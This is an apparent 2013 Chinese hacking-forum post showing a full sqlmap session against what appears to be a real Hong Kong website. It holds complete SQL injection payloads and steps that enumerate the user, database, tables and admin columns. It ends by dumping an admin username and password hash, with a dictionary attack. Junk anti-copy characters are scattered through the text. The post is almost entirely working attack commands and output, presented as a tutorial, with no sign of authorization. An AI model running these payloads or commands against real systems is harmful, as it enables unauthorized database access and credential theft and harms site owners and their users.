中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]
作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 J3 [9 G0 @/ @, ~% _8 L# [; |, E4 h
ms "Mysql" --current-user       /*  注解:获取当前用户名称7 F8 W1 E+ z+ h1 D8 q0 x
    sqlmap/0.9 - automatic SQL injection and database takeover tool
0 ^' C  {$ c/ _; w" S- ^0 J    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ) _9 P. U- L- f0 }  f2 D$ q! f( m+ M6 }[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    7 Y( Z! \) N$ v# t$ H/ W session file
    : a" J4 p/ i8 b/ Y1 x: D# {' e5 J[16:53:54] [INFO] resuming injection data from session file; Y# a$ q8 `  u7 o
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) p6 ?6 O! ]3 ]: u) W2 d
    [16:53:54] [INFO] testing connection to the target url
    , ^# @7 o5 A- L1 S$ l# m1 Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    " w$ E* f! n& j7 [9 v9 L9 ~sts:$ t4 x: j& d" j' e
    ---
    ' V* ]4 t5 X9 `  `7 M, f$ fPlace: GET- c8 b# R5 P4 F7 [1 o; y
    Parameter: id
    $ g4 u2 V; V, O6 W. @8 {    Type: boolean-based blind0 v* S6 N" y! C' R, Y
        Title: AND boolean-based blind - WHERE or HAVING clause
    2 Z0 G& j! C( I! Z0 E; ~    Payload: id=276 AND 799=799
    8 W+ D# g. u. J' T( h( ?    Type: error-based
    $ B% t  G6 C9 B4 Q    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 F. s' J# k( K1 F; d: q& L" \) L
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( {; ~8 P! W( J. l: W9 b4 N
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    & D4 b0 h+ u: o3 Y4 Q# B& P0 f; a),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a): ~  s3 A( X6 h$ T5 K; {
        Type: UNION query
    % R' ^7 K- o- D/ Z# g4 i    Title: MySQL UNION query (NULL) - 1 to 10 columns
    % s0 F5 b5 B/ U    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * w: K/ }7 A' v4 _! f  P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ) P( H6 [# l8 r- w) D& f* d% Q- l2 xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    6 o* A- ^8 T) @5 v; i    Type: AND/OR time-based blind
    3 t: I* V: n- L. z4 x    Title: MySQL > 5.0.11 AND time-based blind7 ^- F* e1 @3 Y/ f  a% \% \, H2 q
        Payload: id=276 AND SLEEP(5)+ a" I3 H5 P  W3 U) ]
    ---0 Y, n4 D3 r& q8 N+ \
    [16:53:55] [INFO] the back-end DBMS is MySQL6 ~! E! w4 i4 A
    web server operating system: Windows
    / \# g$ U  y# Y! ]8 r: h/ Z# lweb application technology: Apache 2.2.11, PHP 5.3.0
    0 N) J% g! F  a, n% \4 \back-end DBMS: MySQL 5.0
    8 V4 K/ a4 V2 l& q1 f[16:53:55] [INFO] fetching current user
    ( p: P; U& A" {: Icurrent user:    'root@localhost'   ! T2 c* L9 u. }  ^
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ( B+ O" L# b  `2 Ftput\www.wepost.com.hk'
  • shutting down at: 16:53:587 @/ f$ G# m8 m3 U2 `! b  q

    / k& k9 h! p4 n" \5 r# f( H  `D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, I' `9 H5 X$ G
    ms "Mysql" --current-db                  /*当前数据库
    ' N& D  j" q2 Z3 R6 N    sqlmap/0.9 - automatic SQL injection and database takeover tool
    5 a: t4 _, P0 d/ @9 @/ z9 A    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    8 E/ T5 Q8 q0 t2 q[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 z/ e* i8 O  y3 K: o+ }+ Z2 w
    session file
    $ u" v4 ?: z1 Q7 y5 n3 Y[16:54:16] [INFO] resuming injection data from session file0 c- {5 E$ u& g  q
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. l- Q* G' C2 P. z& L1 F
    [16:54:16] [INFO] testing connection to the target url: g2 Q7 x$ d9 f$ \
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 }8 a) o5 p; E" o
    sts:
    ' U3 R# b0 t9 Z. l7 B* f---
    7 W4 ?+ X$ h4 J/ _- APlace: GET
    - T% v4 o2 X1 m3 KParameter: id
      M7 W& f$ a$ I% n& H6 W3 K2 Z+ |    Type: boolean-based blind, a0 w* t" W4 k1 g) s: S' z
        Title: AND boolean-based blind - WHERE or HAVING clause5 ?( {7 [, d! f3 L1 ?- P8 G/ J
        Payload: id=276 AND 799=799* }. [9 z' W6 n  y
        Type: error-based
    2 u1 g) o: K& ^* H% ^    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! @3 ?& W3 f. E1 U/ V4 _8 Y5 y
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 L2 O$ M( J2 t
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 K" w' e1 Q; y, k
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    $ x) N' r& H7 ]4 L2 ?    Type: UNION query
    / T; r4 D. n' k( o1 H5 u    Title: MySQL UNION query (NULL) - 1 to 10 columns
    / G- ~: G8 _' y5 f/ t$ _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( \- U1 r$ H0 t
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    , s' X  q9 T2 O  C* `CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ( I3 W- Y% p& [, P6 w    Type: AND/OR time-based blind
    9 m" l) Y5 \' R; N8 N  P& p    Title: MySQL > 5.0.11 AND time-based blind2 N4 ^: d' k8 Q# ~+ w7 {
        Payload: id=276 AND SLEEP(5)
    # B1 |$ E( ^9 R- k, }---6 t( k0 W! j( U, e
    [16:54:17] [INFO] the back-end DBMS is MySQL2 v7 G' s8 Q+ O- N4 \0 a( G
    web server operating system: Windows" K" s5 Q$ a2 k- b1 i. U9 M$ h* Q2 A
    web application technology: Apache 2.2.11, PHP 5.3.0
      j0 ]' F' h) _$ u- i& lback-end DBMS: MySQL 5.0
    ( z9 g6 z/ t# \/ i( U4 ^[16:54:17] [INFO] fetching current database
    4 ~4 Z2 K" O! vcurrent database:    'wepost'
    ; j$ ^. [" e4 Q[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou- o8 U: ~( i- x% d- `8 k1 X# ]% `
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    9 t" f' s3 A6 G" Q# Z1 T: P2 N8 U4 U( WD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & K" @/ N1 ?. q0 s3 h( Xms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    5 t5 n& U8 Y1 \1 t7 r2 w& g) }    sqlmap/0.9 - automatic SQL injection and database takeover tool
    - D$ e8 M. U6 }    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    . g# u: W9 A0 [5 I5 k[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% e. B2 V: ~; V0 d4 n+ Q4 ]1 ^
    session file* z$ }1 P3 o; ]4 P
    [16:55:25] [INFO] resuming injection data from session file8 N2 G& ~5 c2 ~+ t8 S7 s0 D( E& e8 {
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file" S) E8 O- E4 o6 Y* u: o
    [16:55:25] [INFO] testing connection to the target url
    ( K6 S6 L0 {4 E1 t8 y8 x, q1 Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque' N, R+ y5 [- L% h" k3 F1 p
    sts:% v* A! A* H* ]# S. H
    ---
    ( J. U3 ?4 F2 ~2 ?5 l  aPlace: GET" G! e- \- ]0 n6 k
    Parameter: id
    . Y' n. e& I0 X+ T/ i' E0 h    Type: boolean-based blind/ ^; c' ~1 O, S5 q! u! R
        Title: AND boolean-based blind - WHERE or HAVING clause
    $ d) U2 p+ ~0 e% L' P& W    Payload: id=276 AND 799=7997 a9 p+ i# z' C! C" x! Y3 x
        Type: error-based1 b8 o. V6 Z3 k, [) X
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      H" g. X, I( ^6 l! u% S$ h- p    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    4 M& P  F( b0 s. g6 }120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 R$ a5 f. R" n* P; C, g5 D# n/ v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! _$ u# S1 U2 Q$ m- F# R; x
        Type: UNION query
    ; n3 K# v4 Q! S7 ^    Title: MySQL UNION query (NULL) - 1 to 10 columns" k  c  g; _  v  h  G  S9 [
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    9 J* s6 `: |  E' C4 \5 ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    9 f& C/ ^1 m/ cCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    " N7 ~- M3 I3 `" r+ v; L/ a" ]    Type: AND/OR time-based blind
    + z# @# |, E2 |# z8 l    Title: MySQL > 5.0.11 AND time-based blind
    ; \  O" J& C# k/ V    Payload: id=276 AND SLEEP(5)
    7 e% n" Y1 x6 [7 N% }" X9 j) F* J---
    % h" Z; Z+ U# }9 N[16:55:26] [INFO] the back-end DBMS is MySQL
    6 I! L2 J( u' k! Z. {2 Eweb server operating system: Windows
    $ c' |) q; |6 S( }2 E5 `8 ~web application technology: Apache 2.2.11, PHP 5.3.0
    ; {: g- _* B$ r& D6 @0 b2 X3 yback-end DBMS: MySQL 5.0
    9 f; u( j% B8 [' X$ J5 y[16:55:26] [INFO] fetching tables for database 'wepost'
    ) J; _5 Y' ?0 {6 e. J[16:55:27] [INFO] the SQL query used returns 6 entries. z$ U/ ~0 b. O; {# W- y
    Database: wepost
    6 `- a! {) n# [. X0 w  u[6 tables]/ M  @5 v6 a* X* u7 \- i$ W8 I
    +-------------+3 b# `( |0 U1 i$ _6 z7 M; x
    | admin       |
    1 B( e- M% w: s% R| article     |0 Z! ^* b5 w* b" _: R3 H9 w' D' O, s& T
    | contributor |* N6 c/ N- L# I& v! c- L
    | idea        |
    7 t4 |  H9 Y% o" p+ V' E7 Q| image       |
    $ S- `: ~7 t, s" m2 O| issue       |
    6 V- S0 U: G; K1 ]+ J+-------------+
    ; {3 [4 i6 R1 m[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou  K1 h' l: q% a* h# H
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    4 B* U, O  ^# [  [. A+ ~4 a" W9 B) p
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    1 n4 s# r$ `( ~, c  @- _: x/ o0 vms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名* X( g& p% D5 [- L$ `
        sqlmap/0.9 - automatic SQL injection and database takeover tool' c' p5 ?+ P: N1 a9 k/ P
        http://sqlmap.sourceforge.net
  • starting at: 16:56:064 z, E' I+ ~" L; w1 |
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 F/ Y" E+ B, X0 asts:
    9 \* _! N: b. M. O; L* X---
    2 W- P% X) h3 K1 \" p7 ^Place: GET/ G  K' T" F/ `* S
    Parameter: id; a0 ?" n; c; p7 m4 j* l& r
        Type: boolean-based blind! u6 c, N# B# L3 A% Y% _
        Title: AND boolean-based blind - WHERE or HAVING clause7 _" Z5 N+ M9 C% h5 J5 m
        Payload: id=276 AND 799=799* y5 D# k: V" R, g" w8 L' `
        Type: error-based
    / [" X: s9 q( W8 p8 Z    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    * {$ r* F  Z- R. E1 _: ]% l" k    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ! G0 z# o; P: ^( t! x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, r! J+ E( H8 z( _
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 ], V2 D! |( p8 _( i
        Type: UNION query
    - v( N2 c( M% X2 T: p  c    Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 a) I/ k; m& _6 e/ E    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) S4 [, [7 V, y( c
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 R. b- z6 Q& X/ {, e& HCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    0 p) f, O) k* C- L( a    Type: AND/OR time-based blind8 m" m/ g: ~9 c# U3 s: {
        Title: MySQL > 5.0.11 AND time-based blind
    0 F0 c8 ?" h4 f8 p    Payload: id=276 AND SLEEP(5)
    ; U1 g6 v+ x# s) j4 P---
    , r9 s% D( S7 g/ Oweb server operating system: Windows+ S4 C$ q. ]  \/ |- d
    web application technology: Apache 2.2.11, PHP 5.3.0
    8 q9 k4 D/ S5 s* T: d5 dback-end DBMS: MySQL 5.0
    6 q- k- D. D; Z- C# G, M[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    - x1 e7 r$ P1 F% }* Z+ nssion': wepost, wepost
    / |# H  j$ \* i, k- V2 b6 M) ODatabase: wepost
    / k: v9 o. h; k% N$ DTable: admin
    0 r  c% t( r2 H9 ]% V/ N[4 columns]& K$ d4 p' e9 G
    +----------+-------------+0 n) E& z% F. E/ g' r: f* c
    | Column   | Type        |) f7 ]; G5 B" ?6 L
    +----------+-------------+
    ' B8 h; G2 ^& k| id       | int(11)     |
    # t* S* O: T- g8 A9 k6 S- }1 T& b| password | varchar(32) |, I3 L$ f0 T; b2 d2 t# f9 ]6 A4 d
    | type     | varchar(10) |/ }8 X' H5 l4 b7 u- `) l6 i' ?
    | userid   | varchar(20) |/ |  @8 e8 X+ O5 a( Z3 B$ f/ [6 z
    +----------+-------------+
    7 W; H' H+ h3 P1 c( d4 M7 J% i
  • shutting down at: 16:56:19
    - @# T) P. }  M% _+ J1 y- @" Q) _' N4 _2 v+ Q+ _) `
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ) U" F5 w; r  sms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    " k  C3 M4 k) b  `$ m) b    sqlmap/0.9 - automatic SQL injection and database takeover tool
    / J% n' L1 l' V& `! F% h3 B    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    4 ^7 I4 M5 j! F* Psqlmap identified the following injection points with a total of 0 HTTP(s) reque5 y+ [& m6 G4 U( k7 C! I$ g7 Z( u$ s9 _
    sts:
    % F. z6 P: {4 l/ D. A---
    7 [" v1 o# J' {% x0 I' XPlace: GET& z0 B- N: O3 r7 L7 {# J
    Parameter: id4 n3 y" {( x5 A, o
        Type: boolean-based blind* Z/ H3 ]0 v3 @% f6 E0 A4 T
        Title: AND boolean-based blind - WHERE or HAVING clause
    + a8 ^, H, u9 L$ \' e    Payload: id=276 AND 799=799, K& I, y! E. {. o& o
        Type: error-based
    $ x9 R3 x7 T6 Z4 y7 k" a  c& T1 y    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ) ^/ z* c9 ~4 }0 {; [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,# f( X# I2 T9 c# O8 `- B, W
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    9 L" [, q8 T9 p, g8 J1 {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). W7 `9 X3 M. D
        Type: UNION query3 j" }. o, b; v' b. r! m7 k
        Title: MySQL UNION query (NULL) - 1 to 10 columns
      ?! s3 t$ l2 ~9 J5 j! V8 x    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    " W8 _, J- P4 _4 ^+ R/ C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 @. g  ~, l' f  o8 cCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  g! c8 b2 D  J  _/ N( b
        Type: AND/OR time-based blind
    6 w2 u% ]7 |! `9 K* ~    Title: MySQL > 5.0.11 AND time-based blind
    & ^3 @# \# ^! y    Payload: id=276 AND SLEEP(5)* z& D9 K  ~; V1 ^# c, M% y" {: m. U' f% B
    ---
    8 q2 }, ?: V2 x, t; i4 @+ ~web server operating system: Windows# I- r% t5 F6 h, S" d
    web application technology: Apache 2.2.11, PHP 5.3.0, e, ]. f2 K: Y7 K9 P
    back-end DBMS: MySQL 5.0
      r; O! M- z- C& s7 ^! I7 Qrecognized possible password hash values. do you want to use dictionary attack o" G/ ?. @" p2 P+ K
    n retrieved table items? [Y/n/q] y% h' G) X5 k$ e; O
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]' u$ }5 o: w" L* n
    do you want to use common password suffixes? (slow!) [y/N] y
    0 C4 `4 K" S- VDatabase: wepost
    ; f3 f8 T' {" O% a" z( M1 Y9 m7 _Table: admin- r5 b# ?- \/ n. W. v  ?
    [1 entry]$ ~& r$ S% A4 I8 V- Y
    +----------------------------------+------------+8 i% W. @4 H; {  ~5 O  }- q- P* J/ Z
    | password                         | userid     |
    4 j- W8 @$ t7 _$ w+ i+----------------------------------+------------+# O( J, s) }& G; J0 j- ]
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |% S6 G  O3 E' X6 j( p
    +----------------------------------+------------+# q* Q+ W& d5 \% A4 M3 }, K$ |
  • shutting down at: 16:58:14
    ) f" ^9 z* ?! P
    5 S, T5 D2 c" j$ c& AD:\Python27\sqlmap>



    欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2